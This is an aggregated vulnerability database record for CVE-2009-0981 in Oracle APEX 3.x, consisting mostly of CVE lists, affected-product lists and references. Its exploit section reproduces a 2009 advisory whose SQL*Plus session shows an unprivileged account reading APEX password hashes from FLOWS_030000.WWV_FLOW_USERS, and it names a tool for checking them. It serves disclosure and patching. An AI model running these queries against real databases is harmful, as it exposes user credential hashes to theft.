ID

VAR-E-200904-0197


CVE

cve_id:CVE-2009-0981

Trust: 2.4

cve_id:CVE-2009-0991

Trust: 0.8

cve_id:CVE-2009-0992

Trust: 0.3

cve_id:CVE-2009-0973

Trust: 0.3

cve_id:CVE-2009-1016

Trust: 0.3

cve_id:CVE-2009-1011

Trust: 0.3

cve_id:CVE-2009-0994

Trust: 0.3

cve_id:CVE-2009-1000

Trust: 0.3

cve_id:CVE-2009-1017

Trust: 0.3

cve_id:CVE-2009-0997

Trust: 0.3

cve_id:CVE-2009-1005

Trust: 0.3

cve_id:CVE-2009-0999

Trust: 0.3

cve_id:CVE-2009-0993

Trust: 0.3

cve_id:CVE-2009-1013

Trust: 0.3

cve_id:CVE-2009-0975

Trust: 0.3

cve_id:CVE-2009-0989

Trust: 0.3

cve_id:CVE-2009-1006

Trust: 0.3

cve_id:CVE-2009-0984

Trust: 0.3

cve_id:CVE-2009-0986

Trust: 0.3

cve_id:CVE-2009-0190

Trust: 0.3

cve_id:CVE-2009-0977

Trust: 0.3

cve_id:CVE-2009-0995

Trust: 0.3

cve_id:CVE-2009-0980

Trust: 0.3

cve_id:CVE-2009-1010

Trust: 0.3

cve_id:CVE-2009-1012

Trust: 0.3

cve_id:CVE-2009-0998

Trust: 0.3

cve_id:CVE-2009-0978

Trust: 0.3

cve_id:CVE-2009-1003

Trust: 0.3

cve_id:CVE-2009-0976

Trust: 0.3

cve_id:CVE-2009-0988

Trust: 0.3

cve_id:CVE-2009-0974

Trust: 0.3

cve_id:CVE-2009-1002

Trust: 0.3

cve_id:CVE-2009-0979

Trust: 0.3

cve_id:CVE-2009-1004

Trust: 0.3

cve_id:CVE-2009-1008

Trust: 0.3

cve_id:CVE-2009-0972

Trust: 0.3

cve_id:CVE-2009-0982

Trust: 0.3

cve_id:CVE-2009-0996

Trust: 0.3

cve_id:CVE-2009-1014

Trust: 0.3

cve_id:CVE-2009-0189

Trust: 0.3

cve_id:CVE-2009-1009

Trust: 0.3

cve_id:CVE-2009-1001

Trust: 0.3

cve_id:CVE-2009-0990

Trust: 0.3

cve_id:CVE-2009-0983

Trust: 0.3

cve_id:CVE-2009-0985

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675

EDB ID

8456


TITLE

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes - Multiple local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 8456

DESCRIPTION

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes. CVE-53738, CVE-2009-0981. Local exploit for Multiple platform.

Trust: 0.6

sources: EXPLOIT-DB: 8456

AFFECTED PRODUCTS

vendor: oracle, model: apex, scope: eq, version: 3.2

Trust: 1.6

vendor: oracle, model: oracle11g standard edition, scope: eq, version: 11.16

Trust: 0.6

vendor: bea, model: systems weblogic server, scope: eq, version: 10.3

Trust: 0.6

vendor: bea, model: systems weblogic server, scope: eq, version: 10.0

Trust: 0.6

vendor: oracle, model: rdbms tns listener, scope: -, version: -

Trust: 0.5

vendor: apex, model: password hash, scope: -, version: -

Trust: 0.5

vendor: oracle, model: xml publisher, scope: eq, version: 10.1.3.2.1

Trust: 0.3

vendor: oracle, model: xml publisher, scope: eq, version: 5.6.2

Trust: 0.3

vendor: oracle, model: xml publisher, scope: eq, version: 10.1.3.2

Trust: 0.3

vendor: oracle, model: weblogic server, scope: eq, version: 10.3

Trust: 0.3

vendor: oracle, model: peoplesoft enterprise peopletools, scope: eq, version: 8.49

Trust: 0.3

vendor: oracle, model: peoplesoft enterprise hrms, scope: eq, version: 9.0

Trust: 0.3

vendor: oracle, model: peoplesoft enterprise hrms, scope: eq, version: 8.9

Trust: 0.3

vendor: oracle, model: outside in sdk html export, scope: eq, version: 8.3

Trust: 0.3

vendor: oracle, model: outside in sdk html export, scope: eq, version: 8.2.2

Trust: 0.3

vendor: oracle, model: oracle9i standard edition .8dv, scope: eq, version: 9.2

Trust: 0.3

vendor: oracle, model: oracle9i standard edition, scope: eq, version: 9.2.8

Trust: 0.3

vendor: oracle, model: oracle9i personal edition .8dv, scope: eq, version: 9.2

Trust: 0.3

vendor: oracle, model: oracle9i personal edition, scope: eq, version: 9.2.8

Trust: 0.3

vendor: oracle, model: oracle9i enterprise edition .8dv, scope: eq, version: 9.2

Trust: 0.3

vendor: oracle, model: oracle9i enterprise edition, scope: eq, version: 9.2.8.0

Trust: 0.3

vendor: oracle, model: oracle11g standard edition one, scope: eq, version: 11.16

Trust: 0.3

vendor: oracle, model: oracle11g enterprise edition, scope: eq, version: 11.16

Trust: 0.3

vendor: oracle, model: oracle11g enterprise edition, scope: eq, version: 11.1.0.7

Trust: 0.3

vendor: oracle, model: oracle10g standard edition, scope: eq, version: 10.2.3

Trust: 0.3

vendor: oracle, model: oracle10g standard edition, scope: eq, version: 10.1.5

Trust: 0.3

vendor: oracle, model: oracle10g standard edition, scope: eq, version: 10.2.0.4

Trust: 0.3

vendor: oracle, model: oracle10g personal edition, scope: eq, version: 10.2.3

Trust: 0.3

vendor: oracle, model: oracle10g personal edition, scope: eq, version: 10.1.5

Trust: 0.3

vendor: oracle, model: oracle10g personal edition, scope: eq, version: 10.2.0.4

Trust: 0.3

vendor: oracle, model: oracle10g enterprise edition, scope: eq, version: 10.2.3

Trust: 0.3

vendor: oracle, model: oracle10g enterprise edition, scope: eq, version: 10.1.5

Trust: 0.3

vendor: oracle, model: oracle10g enterprise edition, scope: eq, version: 10.2.0.4

Trust: 0.3

vendor: oracle, model: oracle10g application server, scope: eq, version: 10.1.2

Trust: 0.3

vendor: oracle, model: oracle10g application server, scope: eq, version: 10.1.2.3.0

Trust: 0.3

vendor: oracle, model: jrockit r27.6.2, scope: -, version: -

Trust: 0.3

vendor: oracle, model: jrockit r27.6.0, scope: -, version: -

Trust: 0.3

vendor: oracle, model: jrockit r27.1.0, scope: -, version: -

Trust: 0.3

vendor: oracle, model: e-business suite 11i, scope: eq, version: 11.5.10.2

Trust: 0.3

vendor: oracle, model: e-business suite, scope: eq, version: 12.0.6

Trust: 0.3

vendor: oracle, model: data service integrator, scope: eq, version: 10.3

Trust: 0.3

vendor: oracle, model: bi publisher, scope: eq, version: 10.1.3.4

Trust: 0.3

vendor: oracle, model: bi publisher, scope: eq, version: 10.1.3.3.3

Trust: 0.3

vendor: oracle, model: bi publisher, scope: eq, version: 10.1.3.3.2

Trust: 0.3

vendor: oracle, model: bi publisher, scope: eq, version: 10.1.3.3.1

Trust: 0.3

vendor: oracle, model: bi publisher, scope: eq, version: 10.1.3.3.0

Trust: 0.3

vendor: oracle, model: audit vault, scope: eq, version: 10.2.3

Trust: 0.3

vendor: oracle, model: aqualogic data services platform, scope: eq, version: 3.0.1

Trust: 0.3

vendor: oracle, model: aqualogic data services platform, scope: eq, version: 3.2

Trust: 0.3

vendor: oracle, model: aqualogic data services platform, scope: eq, version: 3.0

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.16

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.15

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.14

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.13

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.12

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 8.11

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.0.0.14

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.0.0.13

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.0.0.12

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.0.0.11

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 7.0.0.1

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.07

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.06

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.05

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.04

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.03

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.02

Trust: 0.3

vendor: bea, model: systems weblogic server sp, scope: eq, version: 7.01

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 7.0

Trust: 0.3

vendor: bea, model: systems weblogic server maintenance pack, scope: eq, version: 9.2

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 9.2

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 9.1

Trust: 0.3

vendor: bea, model: systems weblogic server, scope: eq, version: 9.0

Trust: 0.3

vendor: bea, model: systems weblogic server sp7, scope: eq, version: 7.0

Trust: 0.3

vendor: bea, model: systems weblogic server mp1, scope: eq, version: 10.0

Trust: 0.3

vendor: bea, model: systems weblogic portal sp6, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal sp5, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal sp4, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal sp3, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal sp2, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal sp1, scope: eq, version: 8.1

Trust: 0.3

vendor: bea, model: systems weblogic portal, scope: eq, version: 8.1

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675

EXPLOIT

Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Name: Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected: APEX 3.0 (optional component of 11.1.0.7 installation)
Severity: High Risk
Category: Password Disclosure
Vendor URL: http://www.oracle.com/
Author: Alexander Kornbrust (ak at red-database-security.com)
CVE: CVE-2009-0981
Advisory: 14 April 2009 (V 1.00)

Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.

C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
------------------------------
CONNECT

SQL> select owner,table_name from all_tables where owner='FLOWS_030000';

OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE

Get a list of all columns whose name contains the string "PASSWORD":

SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';

OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE

9 rows selected.

SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS;

USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.

Patch Information
Apply the patches for Oracle CPU April 2009.

History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

# milw0rm.com [2009-04-16]

Trust: 1.0

sources: EXPLOIT-DB: 8456

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 8456

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 8456

TYPE

Unprivileged DB users can see APEX Password hashes

Trust: 1.6

sources: EXPLOIT-DB: 8456 // EDBNET: 32675

TAGS

tag:exploit

Trust: 1.0

tag:proof of concept

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 76855 // PACKETSTORM: 76731

CREDITS

Alexander Kornbrust

Trust: 0.6

sources: EXPLOIT-DB: 8456

EXTERNAL IDS

db: NVD, id: CVE-2009-0981

Trust: 2.4

db: EXPLOIT-DB, id: 8456

Trust: 1.6

db: NVD, id: CVE-2009-0988

Trust: 0.9

db: NVD, id: CVE-2009-0991

Trust: 0.8

db: EDBNET, id: 32675

Trust: 0.6

db: EDBNET, id: 68211

Trust: 0.6

db: PACKETSTORM, id: 76855

Trust: 0.5

db: PACKETSTORM, id: 76731

Trust: 0.5

db: ZDI, id: ZDI-09-017

Trust: 0.3

db: NVD, id: CVE-2009-0992

Trust: 0.3

db: NVD, id: CVE-2009-0973

Trust: 0.3

db: NVD, id: CVE-2009-1016

Trust: 0.3

db: NVD, id: CVE-2009-1011

Trust: 0.3

db: NVD, id: CVE-2009-0994

Trust: 0.3

db: NVD, id: CVE-2009-1000

Trust: 0.3

db: NVD, id: CVE-2009-1017

Trust: 0.3

db: NVD, id: CVE-2009-0997

Trust: 0.3

db: NVD, id: CVE-2009-1005

Trust: 0.3

db: NVD, id: CVE-2009-0999

Trust: 0.3

db: NVD, id: CVE-2009-0993

Trust: 0.3

db: NVD, id: CVE-2009-1013

Trust: 0.3

db: NVD, id: CVE-2009-0975

Trust: 0.3

db: NVD, id: CVE-2009-0989

Trust: 0.3

db: NVD, id: CVE-2009-1006

Trust: 0.3

db: NVD, id: CVE-2009-0984

Trust: 0.3

db: NVD, id: CVE-2009-0986

Trust: 0.3

db: NVD, id: CVE-2009-0190

Trust: 0.3

db: NVD, id: CVE-2009-0977

Trust: 0.3

db: NVD, id: CVE-2009-0995

Trust: 0.3

db: NVD, id: CVE-2009-0980

Trust: 0.3

db: NVD, id: CVE-2009-1010

Trust: 0.3

db: NVD, id: CVE-2009-1012

Trust: 0.3

db: NVD, id: CVE-2009-0998

Trust: 0.3

db: NVD, id: CVE-2009-0978

Trust: 0.3

db: NVD, id: CVE-2009-1003

Trust: 0.3

db: NVD, id: CVE-2009-0976

Trust: 0.3

db: NVD, id: CVE-2009-0974

Trust: 0.3

db: NVD, id: CVE-2009-1002

Trust: 0.3

db: NVD, id: CVE-2009-0979

Trust: 0.3

db: NVD, id: CVE-2009-1004

Trust: 0.3

db: NVD, id: CVE-2009-1008

Trust: 0.3

db: NVD, id: CVE-2009-0972

Trust: 0.3

db: NVD, id: CVE-2009-0982

Trust: 0.3

db: NVD, id: CVE-2009-0996

Trust: 0.3

db: NVD, id: CVE-2009-1014

Trust: 0.3

db: NVD, id: CVE-2009-0189

Trust: 0.3

db: NVD, id: CVE-2009-1009

Trust: 0.3

db: NVD, id: CVE-2009-1001

Trust: 0.3

db: NVD, id: CVE-2009-0990

Trust: 0.3

db: NVD, id: CVE-2009-0983

Trust: 0.3

db: NVD, id: CVE-2009-0985

Trust: 0.3

db: BID, id: 34461

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675 // EDBNET: 68211

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2009-0981

Trust: 2.1

url:https://www.exploit-db.com/exploits/8456/

Trust: 0.6

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2009-0991

Trust: 0.5

url:http://www.zerodayinitiative.com/advisories/zdi-09-017/

Trust: 0.3

url:http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html

Trust: 0.3

url:http://secunia.com/secunia_research/2009-22/

Trust: 0.3

url:http://secunia.com/secunia_research/2009-23/

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1016.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1012.html

Trust: 0.3

url:http://www.red-database-security.com/advisory/apex_password_hashes.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1004.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1002.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1006.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1003.html

Trust: 0.3

url:http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1001.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1005.html

Trust: 0.3

url:http://www.oracle.com

Trust: 0.3

url:http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675 // EDBNET: 68211

SOURCES

db: BID, id: 34461
db: PACKETSTORM, id: 76855
db: PACKETSTORM, id: 76731
db: EXPLOIT-DB, id: 8456
db: EDBNET, id: 32675
db: EDBNET, id: 68211

LAST UPDATE DATE

2022-07-27T09:19:54.370000+00:00


SOURCES UPDATE DATE

db: BID, id: 34461, date: 2009-09-01T16:22:00

SOURCES RELEASE DATE

db: BID, id: 34461, date: 2009-04-09T00:00:00
db: PACKETSTORM, id: 76855, date: 2009-04-21T18:08:37
db: PACKETSTORM, id: 76731, date: 2009-04-16T21:55:38
db: EXPLOIT-DB, id: 8456, date: 2009-04-16T00:00:00
db: EDBNET, id: 32675, date: 2009-04-16T00:00:00
db: EDBNET, id: 68211, date: 2009-08-28T00:00:00